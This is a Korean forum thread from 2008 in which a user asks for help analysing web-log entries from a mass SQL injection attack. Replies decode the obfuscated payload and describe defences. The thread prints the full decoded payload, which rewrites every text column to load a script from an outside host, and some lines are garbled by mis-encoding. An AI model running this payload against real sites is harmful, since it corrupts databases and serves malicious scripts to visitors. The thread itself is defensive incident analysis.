크래킹 피해

   youngman0707
   sql인젝션문제이요...코드분석점 부탁드립니다..

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_recover&no=382 [º¹»ç]


%20AnD%20(sElEcT%20ChAr(94)%2BcAsT(CoUnT(1)%20aS%20VaRcHaR(100))%2bChAr(94)%20fRoM%20[mAsTeR]..[sYsDaTaBaSeS])>0 - 122.45.18.42 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) ASPSESSIONIDCQCSDCSB=OBFDPLNCPMBGDLJKJNOHNIBO 200
'%20AnD%20(sElEcT%20ChAr(94)%2BcAsT(CoUnT(1)%20aS%20VaRcHaR(100))%2bChAr(94)%20fRoM%20[mAsTeR]..[sYsDaTaBaSeS])>0%20AnD%20''=' - 122.45.18.42 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) ASPSESSIONIDCQCSDCSB=OBFDPLNCPMBGDLJKJNOHNIBO 200
%25'%20AnD%20(sElEcT%20ChAr(94)%2BcAsT(CoUnT(1)%20aS%20VaRcHaR(100))%2bChAr(94)%20fRoM%20[mAsTeR]..[sYsDaTaBaSeS])>0%20And%20'%25'=' - 122.45.18.42 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) ASPSESSIONIDCQCSDCSB=OBFDPLNCPMBGDLJKJNOHNIBO 200
;dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(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%20aS%20VaRcHaR(4000));eXeC(@s);-- - 122.45.18.42 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) ASPSESSIONIDCQCSDCSB=OBFDPLNCPMBGDLJKJNOHNIBO 200
';dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(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%20aS%20VaRcHaR(4000));eXeC(@s);-- - 122.45.18.42 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) ASPSESSIONIDCQCSDCSB=OBFDPLNCPMBGDLJKJNOHNIBO 200
%25'%20;dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(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%20aS%20VaRcHaR(4000));eXeC(@s);--%20aNd%20'%25'=

  Hit : 3765     Date : 2008/11/10 03:27



    
youngman0707 제가 지식이얕아서 ..이런거발생했을때..어떻게 분석..그리고 보안해야되는지 ..고수님들의 잡다한
한말씀부탁드립니다..

잡다한 한말씀이 저에겐 큰힘이됩니다..
오늘도 즐거운 하루보내세요..
2008/11/10  
ÃʵùÇØÄ¿ ÈÉ..
ÄO¾Æ
Âü Çè³­Çϱ¸³ª..

ÄO phpÁ» ÇÒÁپ˾Æ?
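<?php
// Decode a percent-encoded request string copied from a web-server log so an
// analyst can read it. $str must already hold the raw, still-encoded log value.
//
// The decoded text is attacker-controlled. It is HTML-escaped before output so
// that any markup carried in the logged request is shown as text rather than
// rendered by the browser viewing this page.
//
// Note: urldecode() also converts '+' to a space, so literal plus signs in the
// logged value are lost; use rawurldecode() if they must be preserved.
echo htmlspecialchars(urldecode((string) $str), ENT_QUOTES);
?>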

위 이상한 문자열을 요기 $str 인자로 전달하면 좀 마음이 안정될꼬야
2008/11/10  
pr0sp3r 헤더부분은 날리고 실제 공격 쿼리는 0x부터 헥사값변조후 urldecode 하면아래와 같이 됩니다.<br />
<br />
%' ;dEcLaRe @S VaRcHaR(4000) SeT @s=DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE [' @T '] SET [' @C ']=RTRIM(CONVERT(VARCHAR(4000),[' @C '])) ''<script src=http://s.cawjb.com/s.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Curso aS VaRcHaR(4000));eXeC(@s);-- aNd '%'=
2008/11/11  
k1rha 요즘 이코드 정말 자주보게 되네요 ㅋㅋ mass sql injection 공격이요, 실제로 방어법은 원천적으로 sql injection 방어법과 같습니다만, mass sql 의 화두가 된이유는 IDS IPS 를 우회 할수 있다는 점입니다. 이점을 비롯해 방어법을 설명드리자면 필터링 구문에 mass sql 만의 구문을 필터링 해주면 된다고 하더군요 ... 2008/11/14  
